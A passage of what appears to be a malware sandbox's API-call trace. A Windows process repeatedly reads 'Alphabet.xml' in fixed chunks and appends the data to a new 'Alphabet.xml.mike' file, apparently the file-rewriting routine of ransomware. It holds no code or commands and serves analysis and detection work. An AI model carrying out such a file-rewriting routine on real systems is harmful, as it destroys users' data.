lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x7aa20 [0042.826] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.826] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.826] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.826] GetFileType (hFile=0x264) returned 0x1 [0042.826] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.826] GetFileType (hFile=0x264) returned 0x1 [0042.826] ReadFile (in: hFile=0x264, lpBuffer=0x2159450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2159450*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.827] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.827] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.827] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.827] GetFileType (hFile=0x264) returned 0x1 [0042.827] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.827] GetFileType (hFile=0x264) returned 0x1 [0042.827] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x7d220 [0042.827] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.827] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.828] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.828] GetFileType (hFile=0x264) returned 0x1 [0042.828] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.828] GetFileType (hFile=0x264) returned 0x1 [0042.828] ReadFile (in: hFile=0x264, lpBuffer=0x21663f8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21663f8*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.829] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.829] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.829] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.829] GetFileType (hFile=0x264) returned 0x1 [0042.830] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.830] GetFileType (hFile=0x264) returned 0x1 [0042.830] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x7fa20 [0042.831] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.831] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.831] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.831] GetFileType (hFile=0x264) returned 0x1 [0042.831] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.831] GetFileType (hFile=0x264) returned 0x1 [0042.831] ReadFile (in: hFile=0x264, lpBuffer=0x21733a0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21733a0*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.832] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.832] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.832] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.832] GetFileType (hFile=0x264) returned 0x1 [0042.832] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.832] GetFileType (hFile=0x264) returned 0x1 [0042.832] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x82220 [0042.833] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.833] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.833] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.833] GetFileType (hFile=0x264) returned 0x1 [0042.833] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.833] GetFileType (hFile=0x264) returned 0x1 [0042.833] ReadFile (in: hFile=0x264, lpBuffer=0x2180348, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2180348*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.834] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.834] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.834] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.834] GetFileType (hFile=0x264) returned 0x1 [0042.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.834] GetFileType (hFile=0x264) returned 0x1 [0042.834] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x84a20 [0042.835] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.835] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.835] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.835] GetFileType (hFile=0x264) returned 0x1 [0042.835] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.835] GetFileType (hFile=0x264) returned 0x1 [0042.835] ReadFile (in: hFile=0x264, lpBuffer=0x218d2f0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x218d2f0*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.836] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.836] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.836] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.836] GetFileType (hFile=0x264) returned 0x1 [0042.836] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.836] GetFileType (hFile=0x264) returned 0x1 [0042.836] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x87220 [0042.836] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.836] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.836] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.837] GetFileType (hFile=0x264) returned 0x1 [0042.837] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.837] GetFileType (hFile=0x264) returned 0x1 [0042.837] ReadFile (in: hFile=0x264, lpBuffer=0x219a298, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x219a298*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.838] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.838] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.838] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.838] GetFileType (hFile=0x264) returned 0x1 [0042.838] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.838] GetFileType (hFile=0x264) returned 0x1 [0042.838] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x89a20 [0042.838] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.838] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.838] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.838] GetFileType (hFile=0x264) returned 0x1 [0042.838] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.839] GetFileType (hFile=0x264) returned 0x1 [0042.839] ReadFile (in: hFile=0x264, lpBuffer=0x21a7240, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21a7240*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.840] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.840] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.840] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.840] GetFileType (hFile=0x264) returned 0x1 [0042.840] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.840] GetFileType (hFile=0x264) returned 0x1 [0042.840] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x8c220 [0042.840] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.840] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.840] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.840] GetFileType (hFile=0x264) returned 0x1 [0042.840] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.841] GetFileType (hFile=0x264) returned 0x1 [0042.841] ReadFile (in: hFile=0x264, lpBuffer=0x21b41e8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21b41e8*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.841] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.841] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.841] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.842] GetFileType (hFile=0x264) returned 0x1 [0042.842] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.842] GetFileType (hFile=0x264) returned 0x1 [0042.842] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x8ea20 [0042.842] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.842] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.842] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.842] GetFileType (hFile=0x264) returned 0x1 [0042.842] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.842] GetFileType (hFile=0x264) returned 0x1 [0042.842] ReadFile (in: hFile=0x264, lpBuffer=0x21c1190, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21c1190*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.844] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.844] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.844] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.844] GetFileType (hFile=0x264) returned 0x1 [0042.844] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.844] GetFileType (hFile=0x264) returned 0x1 [0042.844] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x91220 [0042.845] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.845] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.845] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.845] GetFileType (hFile=0x264) returned 0x1 [0042.845] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.845] GetFileType (hFile=0x264) returned 0x1 [0042.845] ReadFile (in: hFile=0x264, lpBuffer=0x21ce138, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21ce138*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.846] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.846] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.846] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.846] GetFileType (hFile=0x264) returned 0x1 [0042.846] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.846] GetFileType (hFile=0x264) returned 0x1 [0042.846] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x93a20 [0042.847] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.847] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.847] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.847] GetFileType (hFile=0x264) returned 0x1 [0042.847] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.847] GetFileType (hFile=0x264) returned 0x1 [0042.847] ReadFile (in: hFile=0x264, lpBuffer=0x21db0e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21db0e0*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.848] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.848] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.848] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.848] GetFileType (hFile=0x264) returned 0x1 [0042.848] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0042.848] GetFileType (hFile=0x264) returned 0x1 [0042.848] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x96220 [0042.849] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml", lpFilePart=0x0) returned 0x3f [0042.849] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0042.849] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0042.849] GetFileType (hFile=0x264) returned 0x1 [0042.849] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0042.849] GetFileType (hFile=0x264) returned 0x1 [0042.849] ReadFile (in: hFile=0x264, lpBuffer=0x21e8088, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21e8088*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0042.850] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml.mike", lpFilePart=0x0) returned 0x44 [0042.850] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0042.850] CreateFileW 